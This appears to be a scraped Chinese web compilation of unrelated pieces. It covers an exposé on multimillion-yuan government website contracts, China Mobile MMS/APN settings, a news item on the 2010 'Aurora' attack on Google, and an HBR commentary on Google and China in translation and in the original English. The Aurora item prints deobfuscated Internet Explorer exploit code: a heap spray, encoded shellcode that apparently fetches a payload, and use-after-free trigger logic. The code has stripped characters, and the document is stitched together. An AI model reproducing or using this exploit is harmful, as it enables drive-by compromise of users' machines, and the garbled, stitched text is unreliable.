网友:功能并不复杂的政府网站，工会网670万元，孔子学院网3520多万元！难道这些网站都是纯金打造的？
地方信产厅官员:3520万元可以用100年。
资深建站人:这两个网站现有的建站成本只需6.5万元和22万元。

谁也没有想到，在网站日益普及的今天，两个普通的政府网站突然引起轩然大波，原因就在于这两个政府网站的建站成本高达4000万元！要知道，目 前政府网站成交额大多在100万元左右。

　　天价网站事件爆发之后，又有各种消息迅速流传开来,孔子学院网中标方五洲汉风是一个刚刚成立不久的新公司,而且就是招标方下属企业;工会网中标 商中软宏大的网页居然不兼容IE之外的浏览器……这些都给这个本来已经一发不可收拾的事件火上浇油。

　　那么,做一个网站到底需要多少钱?

　　事件>>

　　670万元和3520万元掀起轩然大波

　　“听说‘最贵网站’的事了吗？”2010年1月21日一早，建峰（化名）的MSN上就收到了朋友发来的一条消息，他被问得一愣，“亏你还是个做 网站的，快去科普一下吧！”

　　在百度键入关键字“最贵网站”，当3520万的字样跳出来时，建峰暗吸一口凉气，平时过手的网站，基本上10万元就是一大关，“千万建站，难道 要做个新浪、搜狐？”点开新闻仔细研读，发现只是一个政府网站，且3520万元不包括软硬件费用时，建峰马上给朋友留言，“跟我们不一样”，他顿了一下， 微微一笑，紧接着打出了几个字：“他们这三千万卖的可不是技术”。

　　“最贵网站”事件起源于财政部网站的一则中标公告，招标编号为TC099R72的“中国工会网扩建项目一期工程（网站改版、内容管理、站内检 索、统计分析）”的公告引起了网友们的注意——看似简单的功能居然成交价670万元，绝对称得上是“天价标书”。1月20日上午，一位网友将这则公告贴在 了微博里，称自己找到了“全球最贵网站”，其微博浏览量随即飙升。

　　热心的网民纷纷跟进，发挥“群众力量”。很快“最贵网站”的记录便被打破，一则发布于2009年12月15日招标编号为 CEIECZB01-09JX033的标书浮出水面：这个“网络孔子学院网站运营服务项目”的采购人为国家汉办（孔子学院总部），第一包的中标金额高达 3520万元！同样，数千万的成交额只涉及“运营”等软性服务，并不包含硬件采购成本。

　　对于这两起高标建网站的事情，网友Ice在cnBeta上跟帖留言，“怪不得最近科技股这么疯，做个网站都能赚好几百万”；记者MSN上一个朋 友更将签名改为“孔子说：３０００万元这么贵，干脆把我卖了吧！”嬉笑怒骂间，无奈之情溢于言表。

　　除了“嘲讽派”，“写实派”也在网络舆论中扮演重要角色，网友“woshihaojie”留言，“我也是做网站的，这种网站超过10万就是讹 诈！”更有网友以娱乐的形式搞起了“低价竞标”：1200元、1000元、800元、500元……“这种普通CMS（内容管理系统）就可以搞得定的站，华 强北500块有的是人接。别说还不是建站，只是改版”。

　　记者在中国政府采购网上找到另一则“中国工会网扩建项目一期”的招标公告，主要采购建站所涉及的软硬件设备，包括服务器（44台）、磁盘阵列 （4部）、光纤交换机（2台）、邮件服务器（1台）等9类产品60余部高端设备，中标金额为715万元，供应商为广东亿迅科技有限公司。

　　有网友将两组中标数据对比，感叹“科学技术是生产力”的伟大结论：动动脑，一两天的工夫随便给网站做个改版，就够买60台大型服务器了，“以后 谁还敢说网站程序员是IT民工？”

　　面对越演越烈的争议，国家汉办综合处夏建辉主任终于在1月21日接受采访时表示，网友的解读不全面，此次招标并非单纯建设网站，中标公司还要负 责网站的运营管理服务、网站发展规划、技术保障、软件开发、包括提供汉语教学音频、视频、课件等资源的制作、下载在内的一系列内容建设。“网站是要建设成 一个汉语学习的门户网站，要面向全球推广使用，这是一个综合项目，是包括建立网站在内的一揽子工程。”

　　夏建辉表示，此次招标是委托招标公司面向全社会公开招标，招标公司对五洲汉风按照国家相关规章制度进行了审查，其资质肯定没有问题：五洲汉风作 为国家汉办直属企业的身份也肯定经过了审查，没有问题。

　　调查>>

　　相关网站、公司集体装傻

　　1月22日上午10点，记者经过1个小时不停拨打电话后，终于拨通了汉办宣传处的电话，想详细咨询一下网站改版花销的相关细节，但当知道是记者 的来意后，让人哭笑不得的一幕发生了。

　　记者：是国家汉办吗？我是电脑报的记者，想就招标一事简单做个采访。

　　汉办：你是谁？我听不清？

　　记者：电脑报的记者……喂，喂？

　　汉办：听不清楚，你等等再打来吧？信号不好！

　　……挂断电话

　　1月22日上午9点，记者拨通了中国工会网网站下方的联系电话，记者说明采访来意以后，对方负责人只说了句“不清楚”就直接挂断电话。

　　而对于五洲汉风公司，记者无论如何也找寻不到它的联系电话，只在北京市工商行政管理局海淀分局的备案中看见，“五洲汉风”的注册地址为“北京市 海淀区学院路15号楼1区教2楼225”，正是北京语言大学的一栋教学楼里。

　　中软宏大是什么来头

　　事有蹊跷，中标供应商的身份成为人们茶余饭后的谈资，“网络侦探”们也纷纷介入，承接工会网扩建项目的“北京中软宏大信息技术有限公司”首先被 推上舆论风口。在博客“幼学笔记”上，记录了博主对事件主角的“研究成果”：这家有能力做670万元“大项目”的高科技企业的网站，甚至连基本的火狐、傲 游浏览器都无法兼容，只能用IE访问，“不然一打开就是一团乱码”，博主公开质疑该公司的信息技术实力。

　　更为可笑的一幕继而出现，这家号称“专注于软件研发、系统集成与网络安全的高新技术企业”的官方网站，1月21日起竟无法访问，提示“找不到网 页”。

　　“昨晚我还进了他们网站，并做了截图”，民间维权人士张洪峰1月20日晚接到网友爆料，对中软宏大进行跟踪，进入网站后，看到中华总工会与中软 宏大的签约新闻。不过，与网站改版、内容管理、站内检索、统计分析的中标内容不同的是，双方合作的内容变成了VPN网络工程（VPN，Virtual Private Networ 虚拟专用网络），可以理解为虚拟化的企业内部专线）及信息报送系统，“奇怪的是，合作双方、时间、地点等要素完全符合，670万元的网站改版却只字未提， 最后变成了VPN系统签约”。

　　张洪峰为记者提供了Google关于“中软宏大”网站的缓存，可以粗略浏览到“中软宏大”网站的全貌。其界面与多数企业网站类似，但可以看出其 内容较多，共包括17个板块。“应该是他们自己关闭的”，张洪峰直截了当地说，“如果真的是被攻击导致不能浏览，对于一家网络安全公司来说，那可真是他们 的悲哀”。

　　越来越多的蛛丝马迹慢慢被发掘出来：虽然采购方中国工会网络中心委托中招国际招标有限公司进行招标相关事宜，并在财政部网站公示中标结果，但遍 寻网络，无论财政部官网的“招标公告”板块，还是采购信息专业发布平台“中国政府采购网”，根本找不到该项目的招标公告。只有2009年12月25日发布 的“中标公告”。换言之，该项目极有可能没有公开招标，而是采取了其他方式。

　　记者经过多方调查发现，中华总工会与中软宏大颇有渊源。中软宏大是中软集团下属公司，长期为中华总工会网站提供技术支持，包括网络维护与管理， 这正与此次招标主体工会网络中心的工作职能接近。

　　不妨这样理解，中软宏大在一定程度上成为工会网络中心的“亲信”与“雇佣军”。由于这层特殊的关系，此次工会网扩建工程中，中软宏大收获颇丰。 除了备受争议的670万元的天价订单外，记者还找到了另外一份编号为TC099Q77、1月4日公开的标书，1包的承接供应商正是中软宏大，金额为 28.6万元。奇怪的是，中标项目一栏没有任何详细内容。也就是说，总工会花了28.6万元，却没有人知道他们买了中软宏大什么产品。

　　五洲汉风赶巧中标

　　相比中公网的改版，网民更关注“网络孔子学院网站运营服务项目”。

　　该项目供应商为“五洲汉风网络科技（北京）有限公司”，记者尝试在网络上搜寻这家公司的信息，却毫无收获——这家承接了3520万元项目的公 司，不仅没有官方网站，甚至没有任何公开的公司信息，只找到了一家名称接近的“五洲汉风教育科技（北京）有限公司”。难道财政部网站上的公示标书出现了笔 误？记者进入“北京市企业信用系统”进行查询，一切真相大白：这家“五洲汉风网络科技（北京）有限公司”成立于2009年9月9日，注册资金600万元， 企业法人为王永利。

　　因为成立时间太短，且基本没有开展业务，所以网络上信息寥寥，甚至连商务部的系统中都未来得及更新该企业的信息。就是这样一家刚刚成立的新公 司，承接了3520万元的巨额订单。

　　更多的内容陆续被网友“人肉”出来，“五洲汉风”法人代表王永利的另一重身份，正是国家汉办副主任、孔子学院副总干事。由于这层关系，“五洲汉 风”拿到汉办订单似乎也在情理之中。

　　另外，“五洲汉风”的成立时间也比较“赶巧”。汉办此次项目招标截止日期是2009年12月9日，2009年11月中旬对外公开招标，2009 年9月9日刚刚进入营业状态的“五洲汉风”，“刚好”赶上了这次招标。

　　“北京市企业信用系统”中，在企业“经营范围”一栏，“五洲汉风”留下了这样一组令人匪夷所思的文字：“法律、行政法规、国务院决定禁止的，不 得经营；法律、行政法规、国务院决定规定应经许可的，经审批机关批准并经工商行政管理机关注册后方可经营；法律、行政法规、国务院决定未规定许可的，自主 选择经营项目开展活动”，如此才草草应付了事，让人怀疑“五洲汉风”是否真的有经营实业、开拓市场的决心？

　　成本分析>>

　　我给两个网站估估价

　　3520万元可以用100年

　　发言人：某省信息产业厅信息化负责人 王秘书长

　　3520万元对于网站改版来说简直是天价，如果按我们省里的标准计算的话，这笔费用起码可以用100年。

　　先举两个例子，我们省里信产厅的官网建站成本也不过30万元。而我们厅里下设的一个机构建站成本为15万元。现在想想，这个15万元还真是价格 太高了点。不过和中国工会网和网络孔子学院两个网站项目金额比起来，就完全不在一个比较线上了。

　　常常有人会说，软件开发的投入和成本是无法计算的。我并不同意这个观点，比如我就看到一个软件行业普遍认同的软件开发估算办法，并且还有相关公 式：

　　软件开发价格 ＝ 开发工作量 × 开发费用／人·月

　　软件开发工作量 ＝ 估算工作量经验值 × 风险系数 × 复用系数

　　这其中，风险系数分为5个等级，而复用系数是指已经建立能够复用的构件库（核心资产库）或者已有的软件产品，仅作二次开发，能够减少软件开发工 作量的工作。不过，这个公式里还包含着经验和一些其他的数据，比如维护费等等。

　　建站标准不一价值难衡量

　　发言人：摄影人之家网站站长贾富

　　建站成本无非分硬件和软件两部分。除了硬件方面服务器、交换机等可控的成本以外，其他的软件和人力成本都是可大可小的，也是无法用统一尺度衡量 的。

　　首先，网站策划费用可以是0元，也可以一两百万元。比如专业的策划团队会做用户调查、读者功能（报价可以是1000元~10万元）、个性定制 （LOGO、个性VI等），而这些如果聘请专业的设计师来做，花费三五万是很正常的，好的设计20万元也不贵。其次，购买网站源程序的版权和个性定制。做 网站的程序本来就有免费的，但是免费的没有版权保护，需要购买版权或者购买定制版本，这一个定制可能就会花费2万元~50万元，当然定制后有VIP24小 时随叫随到的专门服务，报价会更高。

　　第三，政府类网站安全涉及国家机密，安全至关重要。尽管对于类似摄影人之家的个人网站来说，源程序出现漏洞了由程序员打补丁，简单修改一下或者 安装几个补丁文件就可以，但这毕竟是个人网站。政府类网站要求会更高，比如24小时防范黑客攻击和窃取商业机密，而这一项报价可能达到一二百万元。不仅如 此，网站统计可能是这类网站要求比较高的。尽管现在有很多免费的统计软件，但是政府类网站还是希望能够自己设计软件代码，这一项费用也无疑会增加成本。

　　最后，算上独立的域名、空间和服务器，可能需要在全国甚至更多的地方部署，还需要人力24小时值守，这都涉及到成本，而改版调查、需求反馈等也 需要成本支持。

　　所以说，建站这种事仁者见仁，智者见智，因为工作量无法衡量，所以劳动成果无法拿来比较。

　　记者手记>>

　　阳光需要照到更多的地方

　　尽管根据已经公开的中标公告，我们并不能对这两个中标网站的具体内容做评估或者是评判，因为我们不知道双方约定的是哪些方面的建设和运营，也不 知道双方的合同年限。引起大家质疑和关注的，只是这两个庞大数字与目前IT行业建站的报价差距巨大。

　　从2000元就可以搭起一个平台，到3520万元，这是个令任何人都疯狂的数字。专注于企业建站的策划源网络工作室的创始人刘晓东都感叹，对于 小公司来说，5万元的建站单子就已经算大单了。然而，我们在中国政府采购网上去搜索就很容易发现，高达数十万甚至上百万的政府网站建设或者维护费用并不鲜 见。既然已经可以查到公开的招投标信息，那么关于这些建站项目的费用具体用在什么地方了，是否也能进一步公开呢？

　　实际上，在互联网的大趋势下，政府借助互联网来处理和展示自己的政务已是迫在眉睫的事情，但是如何让政府类网站建设（包括发标、投标、审评等环 节）在公开、公正、透明的原则下，完善流程、加强监督，也是十分关键和必要的。我们只是希望，能够再公开一点，让“阳光政务”能够照到更多的地方。

　　其他政府网站报价一览

　　1.国家税务局2009年度机关局域网维护等6个项目成交总金额近500万元，其中网站升级完善项目金额为106万元。

　　2.中国计划生育协会网站建设一期中标公告显示，成交金额为99万元。

　　3.最高人民法院政务网站升级改造项目采购结果公告显示，中标金额为144万元。

　　4.公安信息网门户网站扩容改造项目，最终中标额度为162万元。

彩信设置

1.名称：中国移动彩信设置
2.APN：cmwap
3.代理：10.0.0.172
4.端口：80
5.用户名：（空着）
6.密码：（空着）
7.服务器：（空着）
8.MMSC： mmsc.monternet.com
9.彩信代理：010.000.000.172
10.彩信端口：80
11.彩信协议：这里要选择 WAP 2.0
12.MCC:460
13.MNC:00
14.APN类型：default,mms,httpproxy,wapgateway
编辑完以后，按MENU 选择 “保存”

上网设置

1.名称：cmnet
2.APN：cmnet
3.代理：
4.端口：
5.用户名：（空着）
6.密码：（空着）
7.服务器：（空着）
8.MMSC：
9.彩信代理：
10.彩信端口：
11.彩信协议：这里要选择 WAP 2.0
12.MCC:460
13.MNC:00
14.APN类型：default
编辑完以后，按MENU 选择 “保存”

TechWeb旗下的DarkReading发表文章，透露iDefense已经收回之前发布的Adobe PDF漏洞导致google被攻击的声明，承认McAfee所说的ie漏洞才是祸源。

文章还给出了一个链接，指向开源渗透测试工具项目Metasploit的博客，上面给出了利用这个IE漏洞的攻击代码链接。代码如下：

【去混淆后的代码】

Evals

• var n = unescape("%u0c0d%u0c0d");
  while (n.length = 524288)n += n;
  n = n.substring(0, 524269 - sc.length);
  var x = new Array();
  for (var i = 0; i  200; i ++ ){
    x[i] = n + sc;
  }
  

  (repeated 1 time)

Writes

htmlscriptvar sc = unescape("  
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805  
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2  
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053  
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8  
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8  
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2  
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f  
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7  
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727  
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6  
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923  
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2  
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8  
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8  
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820  
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8  
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854  
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84  
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4  
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153  
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30  
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e  
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b  
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb  
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c  
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498  
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0  
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc  
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8  
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038  
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e  
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727  
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703  
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653  
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5  
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb  
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be  
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7  
%ubcb9%ub2f6%ubfa8%u00d8");  
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,   
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,   
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,   
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,   
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,   
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,   
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,   
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,   
735, 651, 427, 770, 301, 805, 693, 413, 875);  
var arr = new Array;  
for (var i = 0; i  sss.length; i ++ ){  
  arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cccc=cc.replace(/ ,/ g, ""  
  );  
  cccc = cc.replace(/@/g, ",");  
  eval(cc);  
  var x1 = new Array();  
  for (i = 0; i  200; i ++ ){  
    x1[i] = document.createElement("COMMENT");  
    x1[i].data = "abc";  
  }  
  ;  
  var e1 = null;  
  function ev1(evt){  
    e1 = document.createEventObject(evt);  
    document.getElementById("sp1").innerHTML = "";  
    window.setInterval(ev2, 50);  
  }  
  function ev2(){  
    p = "  
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d  
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";  
    for (i = 0; i  x1.length; i ++ ){  
      x1[i].data = p;  
    }  
    ;  
    var t = e1.srcElement;  
  }  
/scriptspan id="sp1"IMG SRC="aaa.gif" onload="ev1(event)"/span/body/html  

(repeated 1 time)

微软也发布了对这个漏洞的更新分析，表明Windows XP上的IE 6最为危险。值得一提的是，文章特别感谢了CSDN专家博客暨《程序员》杂志专栏作者、微软中国的褚诚云。我们会尽快邀请褚诚云写出更深入的分析文章。

还有专家用视频演示了攻击过程。

此前，《连线》杂志文章给出了大量攻击细节。

文章引述McAfee公司的话，说（攻击Google的）黑客使用了前所未有的战术，组合了加密、隐秘编程技术和IE中的未知漏洞，意图是窃取Google、Adobe和许多其他大公司的源代码。

该公司威胁研究副总裁Dmitri Alperovitch说：在国防工业之外，我们从未见过商业行业的公司遭受过如此复杂程度的攻击。

Alperovitch说，攻击者使用了十几种恶意代码和多层次的加密，深深地挖掘进了公司网络内部，并巧妙掩盖自己的活动。在掩饰攻击和防范常规侦测方法上，他们的加密非常成功。我们从未见过这种水平的加密。非常高超。

McAfee之所以将这种攻击命名为Auroro（极光），是因为他们发现，黑客在将恶意代码编译为可执行文件时，编译器将攻击者机器上的路径名插入代码中。

在IE漏洞被曝光后，微软很快发布了针对性的安全建议书。而McAfee也在其产品中增加了侦测这种攻击所用恶意代码的功能。

虽然最初的攻击始自公司雇员访问恶意网站，但是研究人员还在试图确定网站的URL是通过邮件、聊天程序还是其他方式，比如Facebook或者其他社会化网站。

当用户访问恶意网站的时候，他们的IE浏览器将被袭击，自动而且秘密地下载一系列恶意代码到计算机中。这些代码就像俄罗斯套娃那样，一个跟着一个地下载到系统中。

Alperovitch表示，最初的攻击代码是经过三次加密的shell code，用来激活漏洞挖掘程序。然后它执行从外部机器下载的程序，后者也是加密的，而且会从被攻击机器上删除第一个程序。这些加密的二进制文件将自己打包为几个也被加密的可执行文件。

其中一个恶意程序会打开一个远程后门，建立一个加密的秘密通道，伪装为一个SSL链接以避免被侦测到。这样攻击者就可以对被攻击机器进行访问，将它作为滩头阵地，继续进攻网络上的其他部分，搜索登录凭据、知识产权和其他要找的东西。

McAfee因参与攻击调查，从被攻击公司那里得到了攻击所用的一些恶意代码副本，并在几天前加强了自己的产品。

对于另一家安全企业iDefense之前所说的有些攻击使用了Trojan.Hydraq木马，Alperovitch表示，他发现的恶意代码此前任何反病毒厂商都不知道。

iDefense还说攻击者使用了恶意PDF附件和Adobe PDF程序的漏洞，而Alperovitch说，他调查的公司里没有发现这种情况。但他表示攻击不同公司的方法可能不同，不限于IE漏洞。

当黑客进入系统后，他们将数据发送给位于美国伊利诺依州和得克萨斯州以及中国台湾的指挥控制服务器。Alperovitch所没有识别到美国的系统牵涉到这次攻击，也没有提到攻击者的战果。但Rackspace报告他们无意中在攻击中发挥了少量作用。而iDefense则表示攻击者的目标是许多公司的源码库，而且很多情况下都成功得手。

Alperovitch说攻击看上去是从12月15日开始的，但也有可能更早。似乎结束于1月4日，那一天，用来与恶意代码传输数据的指挥控制服务器被关闭。

他说：我们不知道服务器是由攻击者关闭的，还是其他组织关闭的。但是从那时起，攻击停止了。

Aperovitch还指出，攻击的时机非常好，是在假日期间，公司的运营中心和安全响应团队人手很少。攻击的复杂程度令人印象深刻，是那种此前仅针对国防工业的攻击类型。一般对于商业部门，攻击只是为了获取财务方面的信息，通常是通过SQL注入攻击公司的网站，或者攻击公司不安全的无线网络。网络罪犯一般不会花大量的时间把攻击精雕细刻到如此程度，每个方面都采取混淆/加密防范。

McAfee还掌握了更多攻击细节，但目前不准备公布。他们已经与美国执法部门合作，并将这一问题告知美国各级政府。

近日，Google退华事件引来各方评论，有技术方面的，政治方面的，当然也有商业方面的，Havas Media Lab的主管Umair Haque也在哈佛商学院评论网站上发文表达了自己的看法。

以下为节选翻译：

一座丘陵，一个峡谷，和一个云雾缭绕的山峰。闭上你的眼睛，想象一个倾斜的字母“M”。那就是有利地位新的形状。而最近Google与中国的小冲突就是最好的例子。

一边是资本主义工业时代；另一边，则是下一代资本主义的有利地位。二十世纪和二十一世纪的鸿沟，将其明显的区别开来的。

对垄断和完全控制的追求那已经是上一时期的优势，但中国仍像激光束般盯着这些。中国的这些行为是商学院教科书上的经典黑色艺术。通过大量的分配，大量的诉讼，更强的排外性，廉价的快速消费品，庞大的现金储蓄，导致了优势的增加。

但是目前的优势所在已经改变了。道德优势成为了新的有利地位。这无关于是否获得更多，这关乎做的更好。这无关于出口保护策略，向消费者和生产者施加 压力，让他们买这买那。而这是关乎让人民，群众，社会真正的富裕起来。这无关于不关心他人，而是关乎关爱的更多。这无关于无情冷酷，而关乎真诚、可靠。

这才是Google不愿被中国的政策玩弄的原因。道德优势并不仅仅可以打造更强的品牌、让诚信度更高。还能为打造更好的组织，市场和经济立下基础：

更强的商业，更多没有被工作所麻木的热情的群众。
更强的目标，为了更高的需求而奋斗，而不是降低目标。
更强的战略，对二十世纪类的高压政策和边缘政策有更大的反弹力。
能创造更有意义的价值。
更强的管理，更着重于长远利益。
能选择更好的投资者——诚信的，忠诚的长期投资者，而不仅仅是为了快速赚钱的投机者。
更强的经济，而非使经济衰退，这可以让人们享受一个更诚信的繁荣的社会生活。
二十世纪的优势能让中国造就一些诸如微软、福特和Gaps这样的企业（一些工业时代的企业，生产一些工业时代的产品，并按工业时代的规则经营）。我们现在知道这些故事的结局了，因为我们现在生活在一个经济，政治，社会和自然世界停滞的年代。

Google的成功在于他的企业文化中道德占有优势。而对某些事物妥协对于Google伤害巨大：诸如品牌，战略，引起内讧，企业价值的降低。而更严重 的是，它让Google陷入竞争的恶性循环。Google应该更多的参与政府招标，还是做一个类似于百度那样的国家拥护的冠军？

道德方面的优势有可能是优势的最终成因。这是为什么更好的分配、产品、市场、定价形成的原因，而这些正是优势产生的直接原因。Jim Chanos的投资报告说到：离开道德优势，我们无法创造新的企业价值，而旧的企业价值不是长久之计。

是时候来改朝换代了。今日的挑战并非是盲目的创建一个国家、企业。这是为了一个高速连接的世界而重新构思的新体系。谋求一个道德优势是建设性的资本主义的测试。Google做到了。而中国就像迪拜，俄罗斯和以前的特大企业一样，并没有成功。

附上哈佛商业评论原文

Google, China, and the New High Ground of Advantage

A hill, a giant chasm, and a cloud-covered peak. Close your eyes and picture a lopsided "M" for a second. That's the new landscape of advantage. And the recent skirmish between Google and China is its best example yet.

On one side is the old high ground of the industrial era capitalism; on the other, the new high(er) ground of next-generation capitalism. The yawning chasm in between them is the gap between the 20th century and the 21st.

Currency intervention, breaking Copenhagen, crackdowns , collusion, corruption, coercion, and censorship: China's ongoing bad behavior as global citizen is, when we connect the dots, the gigantic elephant in the world's boardroom. What's driving it?

The quest for monopoly, monopsony, and control. That's yesterday's high ground, and China's focused like a laser beam on it. China's moves are the textbook stuff of b-school's blackest arts. Through larger distribution, fiercer litigation, greater exclusivity, cheaper and faster production, a bigger cash pile, advantage is gained.

But the high ground has shifted. The new high ground is an ethical edge. It's not about having more; it's about doing better. It's not about protecting exports, pressuring buyers and suppliers, price discriminating against the powerless, and programming consumers to buy, buy, buy — it's about making people, communities, and society authentically better off. It's not about caring less — but caring more. It's not about ruthlessness. It's about mindfulness.

That's the real lesson of Google's refusal to play by China's rules. An ethical edge doesn't just build stronger brands, though added cred is a certainly a benefit. Rather, it lays new foundations for better organizations, markets, and economies:

It builds stronger businesses, full of more passionate people, who aren't deadened by their work.
It builds stronger purpose, striving towards a higher calling — not just a lowest common denominator.
It builds stronger strategies, more resilient to 20th century-style coercion and brinksmanship.
It builds thicker, more meaningful value.
It builds stronger management, more focused on the long-run.
It selects better investors — engaged, committed, long-run investors, not just speculators looking for a quick buck.
And it builds stronger economies, that can, instead of stagnating, enjoy an authentic prosperity.
The 20th century high ground might let China build a few dozen Microsofts, Fords, and Gaps: industrial-era companies that make industrial-era stuff — and play by industrial-era rules. Yawn. We know how that story ends, because we're living it: an economy, polity, society, and natural world in stagnation and decline. Dear Wen Jiabao: want fries with that Zombieconomy?

The only way to step past the industrial era's zombified endgame is the new high ground, because only an ethical edge can do all the good stuff above. The old high ground was built for 20th century economics: sell more junk, earn more profit, "grow" — and then crash. An ethical edge operates at a higher economic level. It is concerned with what we sell, how profits are earned, and which authentic, human benefits "grow." It's a concept built for the economics of an interdependent world.

